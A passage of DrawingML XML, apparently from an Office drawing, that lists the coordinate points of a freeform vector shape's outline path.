                  <a:pt x="290" y="501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297" y="515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297" y="515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312" y="508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312" y="508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319" y="515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312" y="529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312" y="529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="367" y="556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="367" y="556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395" y="584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395" y="584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388" y="591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381" y="605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381" y="605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="367" y="591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="367" y="591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="367" y="619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374" y="626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374" y="626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="367" y="626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="353" y="710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="367" y="744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="367" y="744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374" y="765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388" y="772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388" y="772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388" y="772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388" y="779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415" y="814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415" y="814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="422" y="828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="422" y="828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436" y="835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436" y="835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457" y="849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457" y="849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471" y="856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471" y="856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="478" y="882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="478" y="882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="491" y="896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="499" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="499" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="499" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506" y="931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506" y="931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520" y="945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520" y="959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520" y="959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520" y="959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520" y="959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="513" y="959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="513" y="959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="533" y="973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="533" y="973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554" y="987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554" y="987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554" y="1001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554" y="1001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="561" y="1014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="561" y="1014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568" y="1014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568" y="1014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="561" y="987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540" y="945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540" y="945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="513" y="896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="513" y="896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506" y="882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506" y="882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="513" y="882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="513" y="882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="526" y="882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="526" y="882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="533" y="889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="533" y="889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="533" y="896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="533" y="896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="533" y="904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554" y="931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554" y="931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="575" y="952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="575" y="952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589" y="966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589" y="966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="602" y="994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="602" y="994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="609" y="1001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="602" y="1007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="602" y="1007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616" y="1007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631" y="1014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631" y="1014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="651" y="1043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="651" y="1043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="658" y="1070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="658" y="1070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665" y="1098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665" y="1098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="672" y="1112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="672" y="1112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="693" y="1119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="693" y="1119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="707" y="1133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="707" y="1133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="727" y="1140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="727" y="1140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="748" y="1146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="748" y="1146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="776" y="1160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="776" y="1160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="790" y="1168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="790" y="1168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811" y="1160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811" y="1160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="1160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="1160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845" y="1160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="859" y="1175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="859" y="1175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="887" y="1202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="887" y="1202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="921" y="1216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="950" y="1209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="950" y="1209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="950" y="1223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="950" y="1223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="963" y="1237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="963" y="1237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="970" y="1258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="970" y="1258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="977" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="977" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1026" y="1300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1026" y="1300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032" y="1300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039" y="1307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039" y="1307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053" y="1321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060" y="1321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060" y="1321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1074" y="1314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1081" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1081" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060" y="1293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1046" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019" y="1258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019" y="1258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1012" y="1251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1012" y="1251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1012" y="1237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1012" y="1237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1012" y="1230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1012" y="1230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1012" y="1230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1012" y="1230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1026" y="1223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1026" y="1223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1026" y="1209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1026" y="1209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019" y="1195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019" y="1195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1005" y="1175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1005" y="1175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="990" y="1153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="990" y="1153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984" y="1160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="970" y="1168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="970" y="1168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="963" y="1160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956" y="1153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956" y="1153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="950" y="1160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="950" y="1160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="950" y="1168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="950" y="1168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928" y="1168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928" y="1168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="935" y="1146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="935" y="1146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="935" y="1126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="935" y="1126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="943" y="1112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="943" y="1112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956" y="1091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956" y="1091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956" y="1077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956" y="1077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956" y="1070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956" y="1070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="935" y="1063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="935" y="1063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="1070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="1091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="1091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="1098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="1098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="894" y="1112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="894" y="1112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="880" y="1119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="880" y="1119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852" y="1126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852" y="1126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="1119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="1119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811" y="1105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="796" y="1084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="796" y="1084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="790" y="1063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="783" y="1043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="783" y="1043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="790" y="1014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="790" y="1014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="790" y="987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="790" y="987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="783" y="959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="783" y="959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="796" y="945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="796" y="945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811" y="938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811" y="938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811" y="938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811" y="938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="818" y="938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="818" y="938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="818" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="818" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="873" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="887" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="887" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908" y="889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908" y="889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="921" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="943" y="904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="943" y="904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="963" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="963" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="990" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="990" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1005" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1005" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1012" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1012" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1026" y="945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1026" y="945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039" y="980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053" y="994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053" y="994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039" y="904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039" y="904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039" y="889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1046" y="882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1046" y="882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060" y="862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060" y="862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1074" y="856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1074" y="856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1088" y="849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1088" y="849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1123" y="820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1123" y="800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1123" y="800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1130" y="800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1137" y="793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1137" y="793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1130" y="793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1130" y="793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1123" y="786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1123" y="786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115" y="779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115" y="779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1123" y="772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115" y="765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115" y="765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1130" y="751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1130" y="751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1137" y="737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1137" y="737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1150" y="751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1164" y="744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1164" y="744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1164" y="737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1164" y="723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1164" y="723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1171" y="717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1185" y="717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1185" y="717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206" y="710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1213" y="703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1213" y="703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1220" y="703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1220" y="703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1220" y="688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1220" y="688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1226" y="675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1226" y="675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1261" y="661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1296" y="640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1317" y="626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1317" y="626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1324" y="619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310" y="605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310" y="605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310" y="598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1302" y="598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1302" y="598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1289" y="591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1289" y="591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1302" y="591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1302" y="591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1317" y="584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1317" y="584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1317" y="584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1324" y="578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1302" y="571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1302" y="571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1255" y="584"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1060" y="1564"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1060" y="1564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115" y="1550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1178" y="1536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1233" y="1515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1289" y="1487"/>
                </a:lnTo>
